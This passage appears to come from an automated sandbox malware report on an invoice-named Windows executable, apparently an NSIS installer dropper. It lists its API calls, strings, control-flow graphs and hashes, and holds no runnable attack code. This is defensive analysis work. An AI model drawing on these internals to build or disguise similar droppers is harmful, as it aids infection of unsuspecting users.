                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 00405AFA
                                                                                                                                                                                                                      • 0WB, xrefs: 00405B53
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
                                                                                                                                                                                                                      • \*.*, xrefs: 00405B65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                      • API String ID: 2035342205-1263050090
                                                                                                                                                                                                                      • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                                                                                                                      • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                                      • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76012EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76012EE0), ref: 00406736
                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                      • String ID: xgB
                                                                                                                                                                                                                      • API String ID: 2295610775-399326502
                                                                                                                                                                                                                      • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                                                                                      • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 267 403eb5-403ec2 SetWindowPos 264->267 268 403ec8-403ecb 264->268 270 40408c-404091 call 4043ab 265->270 271 40404e-404051 265->271 266->265 267->268 273 403ee5-403eeb 268->273 274 403ecd-403edf ShowWindow 268->274 279 404096-4040b1 270->279 276 404053-40405e call 401389 271->276 277 404084-404086 271->277 280 403f07-403f0a 273->280 281 403eed-403f02 DestroyWindow 273->281 274->273 276->277 298 404060-40407f SendMessageW 276->298 277->270 278 40432c 277->278 286 40432e-404335 278->286 284 4040b3-4040b5 call 40140b 279->284 285 4040ba-4040c0 279->285 289 403f0c-403f18 SetWindowLongW 280->289 290 403f1d-403f23 280->290 287 404309-40430f 281->287 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 287->278 293 404311-404317 287->293 289->286 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->278 300 404319-404322 ShowWindow 293->300 294->295 301 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->301 295->287 296->286 302 403f59-403f5c 297->302 303 403f3c-403f53 SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 404126-40412b 301->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 301->332 306 403f61-403f64 302->306 307 403f5e-403f5f 302->307 303->278 303->302 309 403f72-403f77 306->309 310 403f66-403f6c 306->310 308 403f8f-403f94 call 404338 307->308 308->296 312 403fad-403fc0 SendMessageW 309->312 314 403f79-403f7f 309->314 310->312 313 403f6e-403f70 310->313 312->296 313->308 317 403f81-403f87 call 40140b 314->317 318 403f96-403f9f call 40140b 314->318 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->308 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->279 351 4041ff-404201 340->351 351->279 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->287 356 404244-404271 CreateDialogParamW 353->356 354->278 355 404219-40421f 354->355 355->279 357 404225 355->357 356->287 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->287
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                      • String ID: (7B
                                                                                                                                                                                                                      • API String ID: 3282139019-3251261122
                                                                                                                                                                                                                      • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                                                                                                                      • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 390 403c23-403c2a call 40640a 384->390 391 403c2f-403c54 LoadImageW 384->391 385->384 386 403b98-403bc0 call 4062b6 385->386 386->384 396 403bc2-403bc6 386->396 390->391 394 403cd5-403cdd call 40140b 391->394 395 403c56-403c86 RegisterClassW 391->395 409 403ce7-403cf2 call 403dae 394->409 410 403cdf-403ce2 394->410 399 403da4 395->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 395->400 397 403bd8-403be4 lstrlenW 396->397 398 403bc8-403bd5 call 405cea 396->398 404 403be6-403bf4 lstrcmpiW 397->404 405 403c0c-403c14 call 405cbd call 4063e8 397->405 398->397 403 403da6-403dad 399->403 400->394 404->405 408 403bf6-403c00 GetFileAttributesW 404->408 405->384 412 403c02-403c04 408->412 413 403c06-403c07 call 405d09 408->413 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->403 412->405 412->413 413->405 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->410 433 403d91-403d98 call 40140b 425->433 426->399 427->428 431 403d32-403d42 GetClassInfoW RegisterClassW 428->431 432 403d48-403d6b DialogBoxParamW call 40140b 428->432 431->432 436 403d70-403d79 call 403a28 432->436 433->410 436->403
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                        • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(1033,00423728), ref: 00403B59
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Admonishment64,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Admonishment64,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Admonishment64), ref: 00403C40
                                                                                                                                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Admonishment64$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                      • API String ID: 1975747703-1395080628
                                                                                                                                                                                                                      • Opcode ID: 4b8f836d1c50267b66867ec41ba414706936f04e84537f349976cd451a4143d2
                                                                                                                                                                                                                      • Instruction ID: d9d584b045f25ca5441dadad30e0f8e7905dec5efd4dcfd01c713d0f2754c543
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b8f836d1c50267b66867ec41ba414706936f04e84537f349976cd451a4143d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6761C470204601BBE320AF669E45F2B3A7CEB84749F40447FF945B62E2DB7D9912C62D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402F30 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 492 4030df-4030e5 462->492 489 403139-40313e 463->489 490 40314d-40317d call 40345d call 4031d6 463->490 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 485 40300e-403015 470->485 473->474 481 403087-403095 call 4068b5 474->481 482 403098-4030a2 474->482 481->482 482->452 482->453 485->474 491 403017-40301e 485->491 489->445 500 403182-403185 490->500 491->474 493 403020-403027 491->493 492->459 492->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,00000400), ref: 00402F60
                                                                                                                                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00402FA9
                                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 00402F30
                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                                                                                                                      • Inst, xrefs: 00403017
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
                                                                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402F80
                                                                                                                                                                                                                      • C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
                                                                                                                                                                                                                      • Null, xrefs: 00403029
                                                                                                                                                                                                                      • soft, xrefs: 00403020
                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402F8B, 00402F90, 00402F96
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                      • API String ID: 2803837635-3043623874
                                                                                                                                                                                                                      • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                                                                                                                      • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

